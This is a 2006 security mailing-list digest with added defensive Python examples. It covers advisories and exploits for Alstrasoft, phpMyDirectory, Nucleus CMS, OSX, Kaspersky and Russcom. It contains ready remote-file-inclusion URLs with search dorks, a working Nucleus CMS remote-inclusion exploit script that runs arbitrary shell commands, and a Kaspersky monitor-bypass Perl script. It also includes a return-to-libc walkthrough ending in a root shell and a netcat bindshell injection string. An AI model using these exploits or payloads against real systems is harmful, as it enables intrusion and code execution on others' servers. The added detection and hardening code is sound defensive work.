Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in /home/alstraso/public_html/article/mrarticles.php on line 50



http://www.example.com/article/admin/admin.php?login

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in /home/alstraso/public_html/article/admin/auth.php on line 18



submit_article.php XSS Vuln.


When submitting an article using the submit_article.php file, input is not 
filtered. All the user has to do is enter 


something like 
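
The profile.php and userarticles.php findings above are the classic pattern of a request parameter spliced into SQL text. The following is an added example, not code from the Alstrasoft product or from the poster: it rebuilds that pattern against a constructed in-memory SQLite table (the product's real schema is not on the page) and places the hardened form beside it, so the effect of the post's two inputs can be reproduced offline.

```python
import sqlite3

# Constructed sample rows standing in for the application's article table
# (hypothetical schema; the real product's table layout is not on the page).
SAMPLE_ARTICLES = [
    (1, 1, "First article by author 1"),
    (2, 1, "Second article by author 1"),
    (3, 2, "Only article by author 2"),
    (4, 3, "Only article by author 3"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, aut_id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    return conn


def articles_vulnerable(conn, aut_id):
    """The reported pattern: the request parameter is spliced into the SQL text.

    Returns ("rows", [...]) or ("error", message). The error branch is the
    database's own message, which the post shows being echoed to the visitor.
    """
    sql = "SELECT id, title FROM articles WHERE aut_id=" + aut_id
    try:
        return ("rows", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def articles_hardened(conn, aut_id):
    """Validate the type, then bind the value; the input can never become SQL.

    Returns ("rows", [...]) or ("rejected", reason). Database error text is
    never handed back to the caller, so no path or syntax detail can leak.
    """
    try:
        author = int(aut_id)
    except (TypeError, ValueError):
        return ("rejected", "aut_id must be an integer")
    rows = conn.execute(
        "SELECT id, title FROM articles WHERE aut_id=?", (author,)
    ).fetchall()
    return ("rows", rows)


if __name__ == "__main__":
    db = make_db()
    for value in ("3", "3 or 3=3--", "1'"):
        print("vulnerable", repr(value), articles_vulnerable(db, value))
        print("hardened  ", repr(value), articles_hardened(db, value))
```

With the concatenated query, `3 or 3=3--` returns every row and `1'` returns the raw parser error; with the type check and bound parameter both inputs are rejected before any SQL is built. Turning off verbose error display in production closes the path-disclosure side of the report independently of the injection fix.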



AlstraSoft E-Friends - XSS

2006-05-23 Thread luny
AlstraSoft E-Friends - XSS 


Homepage: 

http://www.alstrasoft.com/ 


Description:


Alstrasoft E-friends allows you to run a community site like MySpace and 
Friendster. 


Affected files or areas of the site:

index.php 


The input forms on the items listed below do not properly filter out all 
potentially harmful characters; XSS is possible because of this. 


Posting a blog

Posting a listing

Posting an event

Adding comments

Sending a message


phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

2006-05-23 Thread ajannhwt
ENGLISH


# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File Include 
Vulnerabilities


# Dork   :   "powered by phpmydirectory"


# Author :   ajann


# greetz :   Nukedx,TheHacker 


# Exploit;


###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls


###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls


###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls


### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls


# ajann,Turkey



TURKISH


# Title  :   phpMyDirectory <= 10.4.4 Multiple Remote File 
Include Vulnerabilities

# Dork [Search]   :   "powered by phpmydirectory"

# Discovered by :   ajann

# greetz  :   Nukedx,TheHacker 

# Vulnerable files;


###  
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

###  
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

### SOME; 
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls


Description: 

The footer.php file shipped in the themes introduces a security hole which 
allows remote code execution.

If defaults_setup.php was not deleted after installation, the same hole 
applies.

The test/header.php component is only sometimes present, but it has the 
same hole.

The hole works on versions up to and including 10.4.4.


Thanks.


[security bulletin] HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local Elevation of Privilege

2006-05-23 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00659649
Version: 1

HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local 
Elevation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon 
as soon as possible.

Release Date: 2006-05-22
Last Updated: 2006-05-22

Potential Security Impact: Local elevation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running 
Software Distributor. These vulnerabilities could be exploited by a local 
authorized user to gain elevated privileges.

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running Software Distributor

BACKGROUND

The Hewlett-Packard Company thanks NCC Group
for reporting this vulnerability to [EMAIL PROTECTED]

AFFECTED VERSIONS

HP-UX B.11.23
=
SW-DIST.SD-CMDS
action: install revision B.11.23.0606.045 or subsequent

HP-UX B.11.11
=
SW-DIST.SD-CMDS
action: install PHCO_34539 or subsequent

HP-UX B.11.04
=
SW-DIST.SD-CMDS
action: install PHCO_34814 or subsequent

HP-UX B.11.00
=
SW-DIST.SD-CMDS
action: install PHCO_34568 or subsequent

END AFFECTED VERSIONS
RESOLUTION

HP has made the following software updates available to resolve the issue.
The patches are available from http://itrc.hp.com
The software update is available from http://www.hp.com/go/softwaredepot/

HP-UX B.11.23 - B.11.23.0606.045 or subsequent

HP-UX B.11.11 - PHCO_34539 or subsequent

HP-UX B.11.04 - PHCO_34814 or subsequent

HP-UX B.11.00 - PHCO_34568 or subsequent

MANUAL ACTIONS: Yes - Update
B.11.23 - install revision B.11.23.0606.045 or subsequent
B.11.11 - no manual actions
B.11.04 - no manual actions
B.11.00 - no manual actions

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all 
HP-issued Security Bulletins to provide a subset of recommended actions that 
potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY
Version: 1 (rev.1) - 22 May 2006 Initial release

Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: [EMAIL PROTECTED]  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
- use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

GN = HP General SW,
MA = HP Management Agents,
MI = Misc. 3rd party SW,
MP = HP MPE/iX,
NS = HP NonStop Servers,
OV = HP OpenVMS,
PI = HP Printing & Imaging,
ST = HP Storage SW,
TL = HP Trusted Linux,
TU = HP Tru64 UNIX,
UX = HP-UX,
VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all war

Nucleus CMS <= 3.22 arbitrary remote inclusion

2006-05-23 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on

http://retrogod.altervista.org\r\n\r\n";;

echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";

echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS 
. Back to top\r\n\r\n";

/*

works with:

register_globals=On

allow_url_fopen=On

*/


if ($argc<5) {

echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";

echo "host:  target server (ip/hostname)\r\n";

echo "path:  path to Nucleus\r\n";

echo "location:  an arbitrary location with the code to include\r\n";

echo "cmd:   a shell command\r\n";

echo "Options:\r\n";

echo "   -p[port]:specify a port other than 80\r\n";

echo "   -P[ip:port]: specify a proxy\r\n";

echo "Examples:\r\n";

echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat ./../../config.php\r\n";

echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la -p81\r\n";

echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la -P1.1.1.1:80\r\n\r\n";

echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n";

echo "\r\n";

die;

}


/* software site: http://nucleuscms.org/


   i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:


   ...

   global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS, $HTTP_POST_FILES, $HTTP_SESSION_VARS;

$aVarsToCheck = array('DIR_LIBS');

foreach ($aVarsToCheck as $varName)

{

if (phpversion() >= '4.1.0')

{

if (   isset($_GET[$varName])

|| isset($_POST[$varName])

|| isset($_COOKIE[$varName])

|| isset($_ENV[$varName])

|| isset($_SESSION[$varName])

|| isset($_FILES[$varName])

){

die('Sorry. An error occurred.');

}

} else {

if (   isset($HTTP_GET_VARS[$varName])

|| isset($HTTP_POST_VARS[$varName])

|| isset($HTTP_COOKIE_VARS[$varName])

|| isset($HTTP_ENV_VARS[$varName])

|| isset($HTTP_SESSION_VARS[$varName])

|| isset($HTTP_POST_FILES[$varName])

){

die('Sorry. An error occurred.');

}

}

}


include($DIR_LIBS . 'ADMIN.php');

...


so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote 
inclusion, poc:


http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la


where on somehost.com we have some php code in


http://somehost.com/ADMIN.php/index.html


also, if register_globals = On & magic_quotes_gpc = Off:


http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la


  */

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);


function quick_dump($string)

{

  $result='';$exa='';$cont=0;

  for ($i=0; $i<=strlen($string)-1; $i++)

  {

   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

   {$result.="  .";}

   else

   {$result.="  ".$string[$i];}

   if (strlen(dechex(ord($string[$i])))==2)

   {$exa.=" ".dechex(ord($string[$i]));}

   else

   {$exa.=" 0".dechex(ord($string[$i]));}

   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}

  }

 return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)

{

  global $proxy, $host, $port, $html, $proxy_regex;

  if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

  echo 'No response from '.$host.':'.$port; die;

}

  }

  else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

  echo 'Not a valid proxy...';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";

$ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

  echo 'No response from proxy...';die;

}

  }

  fputs($ock,$packet);

  if ($proxy=='') {

$html='';

while (!feof($ock)) {

  $html.=fgets($ock);

}

  }

  else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

  $html.=fread($ock,1);

}

  }

  fclose($ock);

  #debug

  #echo "\r\n".$html;


}

$host=$argv[1];

$path=$argv[2];

$loc=urlencode($argv[3]);

if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))

{die("Check the path, it must begin and end with a trailing slash\r\n");}

$port=80;

$proxy="";

$cmd="";

for ($i=4; $i<=$argc-1; $i++){

$temp=$argv[$i][0].$argv[$i][1];

if (($temp<>"-p") and ($temp<>"-P"))

{

$cmd.=" ".$argv[$i];

}

if ($temp=="-p")

{

  $port=str_replace("-p","",$argv[$i]);

}

if ($
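
The three web-application posts above (Alstrasoft Article Manager Pro, phpMyDirectory and Nucleus CMS) leave recognisable traces in an ordinary web server access log: a quote or `or N=N--` in a numeric parameter, a parameter whose value is a full URL, a `%00` terminator, and a parameter named `GLOBALS[...]`. The following is an added example, not code from any of those projects or posters: it runs those four checks over a few constructed Apache-style log lines (documentation IP ranges, invented paths) using only the standard library, and returns the findings rather than printing them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (Apache common format) modelled on the request
# shapes quoted in the posts above; addresses come from documentation ranges.
LOG_SAMPLE = """\
203.0.113.5 - - [23/May/2006:10:01:02 +0000] "GET /article/profile.php?author_id=1' HTTP/1.1" 200 512
203.0.113.5 - - [23/May/2006:10:01:09 +0000] "GET /article/userarticles.php?aut_id=3%20or%203=3-- HTTP/1.1" 200 9031
198.51.100.7 - - [23/May/2006:10:02:30 +0000] "GET /dir/template/default/footer.php?ROOT_PATH=http://203.0.113.9/cmd.txt HTTP/1.1" 200 140
198.51.100.7 - - [23/May/2006:10:02:41 +0000] "GET /nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la HTTP/1.1" 200 77
192.0.2.44 - - [23/May/2006:10:03:00 +0000] "GET /article/userarticles.php?aut_id=3 HTTP/1.1" 200 2210
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A quote, a comment marker, or an "or x=y" tail inside a parameter value.
SQLI_RE = re.compile(r"'|--|\b(?:or|and)\b\s+\S+\s*=\s*\S+", re.IGNORECASE)
# A parameter value that is itself a remote URL (include-path overrides).
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# (rule name, predicate over the decoded parameter name and value)
RULES = [
    ("register_globals_override", lambda k, v: k.startswith("GLOBALS[")),
    ("remote_file_inclusion", lambda k, v: bool(REMOTE_RE.match(v))),
    ("null_byte_truncation", lambda k, v: "\x00" in v),
    ("sql_injection_probe", lambda k, v: bool(SQLI_RE.search(v))),
]


def scan_request(target):
    """Return (path, [(param, rule), ...]) for one request target string."""
    parts = urlsplit(target)
    findings = []
    # parse_qsl percent-decodes values, so %00 becomes a real NUL byte here.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        for name, pred in RULES:
            if pred(key, value):
                findings.append((key, name))
    return parts.path, findings


def scan_log(text):
    """Scan access-log text; returns a list of (ip, path, param, rule)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip silently
        path, findings = scan_request(m.group("target"))
        for param, rule in findings:
            hits.append((m.group("ip"), path, param, rule))
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_SAMPLE):
        print("%s %s param=%s rule=%s" % hit)
```

The quote rule is a probe indicator, not proof: a free-text search field legitimately contains apostrophes, so in practice it is scoped to parameters that should be numeric (author_id, aut_id). The `GLOBALS[` rule is specific to the register_globals bypass the Nucleus post describes and has no legitimate use in a request.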

Non eXecutable Stack Lovin on OSX86

2006-05-23 Thread KF (lists)


 Non eXecutable Stack Lovin on OSX86 
kf[at]digitalmunition[dot]com
 05/18/06

After my obligatory Cinco De Mayo Corona hangover had passed, I decided it was 
time to score a little Non eXecutable Mac Mini Hotness from my local Apple 
retailer. After calmly explaining to the salesman "NO, I don't want a keyboard 
OR a mouse... no monitor! NO extra ram either, JUST the MacMini!" I made my 
purchase and returned home quickly. 

Before I knew it the OS was installed and it was time to lift up the Mini's 
skirt and see what was going on behind the scenes. The first thing I wanted to 
do was verify that the non executable stack was actually doing what it was 
designed to do. Simply creating a vulnerable program and trying to run code 
from the stack was enough to validate that Apple had at the very least made 
proper use of the NX flag in their intel product line. 

k-fs-computer:~ kf$ cat > test.c
// make me setuid root 
main(int *argc, char **argv)
{
char buf[200];
sprintf(buf, "%s", argv[1]);
printf("test\n");
printf("buf: %s\n", buf);
return 0;
}

k-fs-computer:~ kf$ cc -o test test.c
test.c: In function 'main':
test.c:4: warning: incompatible implicit declaration of built-in function 
'sprintf'
test.c:5: warning: incompatible implicit declaration of built-in function 
'printf'

k-fs-computer:~ kf$ gdb -q ./test
Reading symbols for shared libraries .. done
(gdb) r `perl -e 'print "A" x 212 . "ABCD"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Users/kf/test `perl -e 'print "A" x 212 . "ABCD"'`
test
buf: 
AAA...

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44434241
0x44434241 in ?? ()

After locating the length to overwrite eip we simply need to locate our string 
and try to return into it. 

(gdb) x/2s $edi
0xbbcc:  "/Users/kf/test"
0xbbdb:  'A' ...

(gdb) r `perl -e 'print "A" x 212 . pack('l', 0xbbdb)'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Users/kf/test `perl -e 'print "A" x 212 . pack('l', 0xbbdb)'`
test
buf: 
AAA...

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0xbbdb
0xbbdb in ?? ()

As you can see from the KERN_PROTECTION_FAILURE Apple has done a successful job 
at implementing the Intel NX bit support in OSX. The presence of the NX bit 
alone however does not mean that OSX is immune to code execution attacks. 

Classic non executable stack bypass techniques involve return into libc based 
exploits and OSX is not exempt from this style of attack by any means. The 
KERN_PROTECTION_FAILURE failure we experienced above can in theory be bypassed 
by doing a simple return into system(). In practice it seems to work quite 
well. 

Plenty of papers outline the methods involved in return into system() style 
attacks so I won't go into them here. In essence what we need is for the buffer 
to have the following structure: 
< Ax212 > < system address > < exit address > < /bin/sh address > 

(Thanks to JohnH - [EMAIL PROTECTED] for reminding me of the *proper* place to 
stash "/bin/sh" )  

Once everything is in place we are ready to rock, no shellcode hassle and no 
KERN_PROTECTION_FAILURE.
k-fs-computer:~ kf$ export SSH_CLIENT=" /bin/sh -i "
k-fs-computer:~ kf$ ./test `perl -e 'print "A"x212 . pack('l',0x90047530) . pack('l', 0x90010bf0) . pack('l',0xbd02)'`
test
buf: 
AAA...

   ýÿ¿
sh-2.05b# id
uid=501(kf) gid=501(kf) euid=0(root) groups=501(kf), 81(appserveradm), 
79(appserverusr), 80(admin)

This should come as no shock... this technique is nothing new, but we should 
keep in mind that this IS an option for future exploits to take advantage of. 

Having got *that* out of the way I wanted to get a little closer with my Mini, 
you know *really* get to know her. Since I had already peeked under the skirt a 
bit I decided it was time for the clothes to come completely off. =] 

Consider this example program, how exactly can we make it give us some lovin?  

#include <stdio.h>
#define BUFLEN 1024
int main(void)
{
char buf[BUFLEN];
while(fgets(buf,BUFLEN,stdin) != NULL){
printf(buf);
printf("\n");
}
return 0;
}

If this were a linux box I would simply start down the path of overwriting the 
.dtors section. Since we are on an OSX machine this is simply not an option as 
.dtors does not exist (unless you are using Objective-C?). Saved return 
addresses were an option I coul

[OpenPKG-SA-2006.008] OpenPKG Security Advisory (openldap)

2006-05-23 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security Advisory                        The OpenPKG Project
http://www.openpkg.org/security/                 http://www.openpkg.org
[EMAIL PROTECTED]                                [EMAIL PROTECTED]
OpenPKG-SA-2006.008                              22-May-2006


Package:             openldap
Vulnerability:       stack-based buffer overflow
OpenPKG Specific:    no

Affected Releases:   Affected Packages:             Corrected Packages:
OpenPKG CURRENT      <= openldap-2.3.21-20060510    >= openldap-2.3.22-20060517
OpenPKG 2.5          <= openldap-2.3.11-2.5.0       >= openldap-2.3.11-2.5.1
OpenPKG 2.4          <= openldap-2.2.27-2.4.0       >= openldap-2.2.27-2.4.1
OpenPKG 2.3          <= openldap-2.2.23-2.3.1       >= openldap-2.2.23-2.3.2

Description:
  According to a Secunia security advisory [0], a weakness exists in
  OpenLDAP [1] caused by a boundary error in slurpd(8) within the
  handling of the status file. This can be exploited to cause a
  stack-based buffer overflow via an overly long hostname read from
  the status file. The weakness has been reported to be in OpenLDAP
  version 2.3.21 and earlier.


References:
  [0] http://secunia.com/advisories/20126
  [1] http://www.openldap.org/


For security reasons, this advisory was digitally signed with the
OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the
OpenPKG project which you can retrieve from http://pgp.openpkg.org and
hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org
for details on how to verify the integrity of this advisory.


-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iD8DBQFEch7ggHWT4GPEy58RAtYHAKDZiml+b7Pre9VLp+IfQJMK8Tck/gCfT5Uo
+ZBkVV4tlIHscrezaR6x+rY=
=U7I+
-END PGP SIGNATURE-


Kaspersky antivirus 6: HTTP monitor bypassing

2006-05-23 Thread john
Kaspersky antivirus 6

Kaspersky internet security 6


www.kaspersky.com


Vulnerable Systems: KAV6, KIS6 


Detail:

The vulnerability is caused by HTTP parsing errors in the HTTP monitor 
(Kaspersky Web-antivirus).

Any malicious software on the local computer can bypass the HTTP virus monitor. 


Solution:

There is no known solution.


Exploit code:


This Perl script can be run with ActiveState Perl 5.8:


use IO::Socket::INET;

use strict;


my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

  'http://www.eicar.com/download/eicar.com' );


syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";


my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

   PeerPort => $h_port,

   Proto=> 'tcp' );

die "socket: $!" unless $s;


sendthem( $s,

  "GET $h_url HTTP/1.1",

  "Host: $h_srv",

  ""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."\n";


sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "\r" );

sendone( $s, "\n" );

}

}


sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working ;)

select( undef, undef, undef, 0.300 );

}


sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "\r\n";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;

}

$cl;

}


sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "\n";

next if $v eq "\r";

$str .= $v;

}

return $str;

}


sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body  ...\n"; 

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}
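
The script above defeats the monitor by trickling the request one byte at a time with a pause between bytes (the `select` call flagged in `sendone`): an inspector that parses each TCP segment on its own never sees a whole header or body. The following is an added example, not Kaspersky's code or the poster's: a small reassembler that buffers until the header terminator and then until Content-Length bytes of body are present, fed a constructed response both whole and one byte at a time, next to a naive per-segment matcher that shows what goes wrong without reassembly. The response body and the signature string are invented.

```python
# Constructed HTTP response used as the sample stream (not the page's data).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 21\r\n"
    b"\r\n"
    b"constructed-test-body"
)

# Constructed content signature a monitor might look for in the body.
SIGNATURE = b"test-body"


class HttpMessageReassembler:
    """Accumulates one HTTP message across arbitrarily fragmented reads.

    Buffering until the header terminator, then until Content-Length bytes
    of body have arrived, makes the parsed result independent of how the
    sender split the stream into segments.
    """

    def __init__(self):
        self.buf = b""
        self.start_line = None
        self.headers = None
        self.body_len = None
        self.body = None

    def feed(self, chunk):
        """Add bytes; returns True once the whole message has been assembled."""
        if self.body is not None:
            return True
        self.buf += chunk
        if self.headers is None:
            end = self.buf.find(b"\r\n\r\n")
            if end < 0:
                return False  # header block still incomplete
            head, self.buf = self.buf[:end], self.buf[end + 4:]
            lines = head.decode("latin-1").split("\r\n")
            self.start_line = lines[0]
            self.headers = {}
            for line in lines[1:]:
                name, _, value = line.partition(":")
                self.headers[name.strip().lower()] = value.strip()
            self.body_len = int(self.headers.get("content-length", "0"))
        if len(self.buf) >= self.body_len:
            self.body = self.buf[:self.body_len]
            return True
        return False


def reassemble(chunks):
    """Feed a sequence of byte chunks and return the reassembler."""
    r = HttpMessageReassembler()
    for chunk in chunks:
        if r.feed(chunk):
            break
    return r


def bytewise(data):
    """Split a byte string into one-byte chunks, as the trickling sender does."""
    return [data[i:i + 1] for i in range(len(data))]


def per_segment_match(chunks, signature=SIGNATURE):
    """A monitor that inspects each segment in isolation."""
    return any(signature in chunk for chunk in chunks)


def reassembled_match(chunks, signature=SIGNATURE):
    """A monitor that inspects the reassembled body."""
    r = reassemble(chunks)
    return r.body is not None and signature in r.body


if __name__ == "__main__":
    whole, trickled = [SAMPLE_RESPONSE], bytewise(SAMPLE_RESPONSE)
    print("whole stream:     per-segment", per_segment_match(whole),
          "reassembled", reassembled_match(whole))
    print("one byte at a time: per-segment", per_segment_match(trickled),
          "reassembled", reassembled_match(trickled))
```

Delays between bytes do not change the bytes, so a reassembler that keys on message structure rather than segment boundaries sees the same headers and body either way; an inspector that also enforces a bound on how long a message may stay incomplete avoids the memory cost of a sender that never finishes.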



SkyeShoutbox <= v.1.2.0 XSS

2006-05-23 Thread zerogue
SkyeShoutbox <= v.1.2.0 XSS


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)


SkyeShoutbox doesn't filter any input at all, thus 

allowing attackers to inject arbitrary html or javascript.


Nomenumbra


Russcom Ping Remote code execution

2006-05-23 Thread zerogue
Russcom Ping Remote code execution


Discovered by: Nomenumbra

Date: 21/5/2006

impact:high (Remote code execution)


Russcom's Ping script allows attackers to execute 

arbitrary code through command piping after the ip (e.g. 127.0.0.1 | nc -l -p 666 
-e /bin/sh would grant a bindshell)


Nomenumbra
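
The weakness described above is the target string reaching a shell. The following is an added example, not Russcom's code: the vulnerable shape (a command string built from the input) next to a form that validates the target as an IP address with the standard `ipaddress` module and hands `ping` an argument list with no shell in between. The piped sample input is constructed.

```python
import ipaddress
import subprocess


def vulnerable_command(target):
    """The reported pattern: user input pasted into a shell command line.

    Handed to a shell, a '|' or ';' in target ends the ping and starts a
    second command of the caller's choosing.
    """
    return "ping -c 1 " + target


def ping_argv(target, count=1):
    """Build ping's argv for a user-supplied target with no shell involved.

    Raises ValueError unless the target parses as an IPv4/IPv6 address, so
    shell metacharacters are rejected before any command is built; the list
    form means nothing interprets the arguments even if they got through.
    """
    addr = ipaddress.ip_address(target.strip())
    count = int(count)
    if not 1 <= count <= 5:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), str(addr)]


def run_ping(target, count=1, timeout=10):
    """Run the validated command without a shell; returns (exit code, stdout)."""
    proc = subprocess.run(ping_argv(target, count), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout


# Constructed input in the shape the post describes (a pipe after the address).
PIPED_INPUT = "127.0.0.1 | id"

if __name__ == "__main__":
    print(vulnerable_command(PIPED_INPUT))
    try:
        print(ping_argv(PIPED_INPUT))
    except ValueError as exc:
        print("rejected:", exc)
```

If hostnames must be accepted as well, the check becomes a strict hostname grammar rather than `ip_address`, but the argument list and the absence of a shell stay the same; `run_ping` is shown for completeness and is not exercised by the checks.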


Russcom PHPImages lack of validation

2006-05-23 Thread zerogue
Russcom PHPImages lack of validation


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate 


Russcom's PHPImages doesn't validate if the uploaded

file is an image, it just checks for the extension, thus 

allowing an attacker to upload php scripts with a .gif extension

for example, potentially allowing him (through file inclusion vulns for

example) to execute arbitrary code.


Nomenumbra
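
An extension check alone accepts any bytes named `*.gif`. The following is an added example, not Russcom's code: a validator that requires the file's leading bytes to carry the signature of the format its extension claims, and additionally refuses a valid image header followed by PHP tags (the polyglot case), run over a handful of constructed uploads. The accepted-type list and the sample files are invented for the example.

```python
import os

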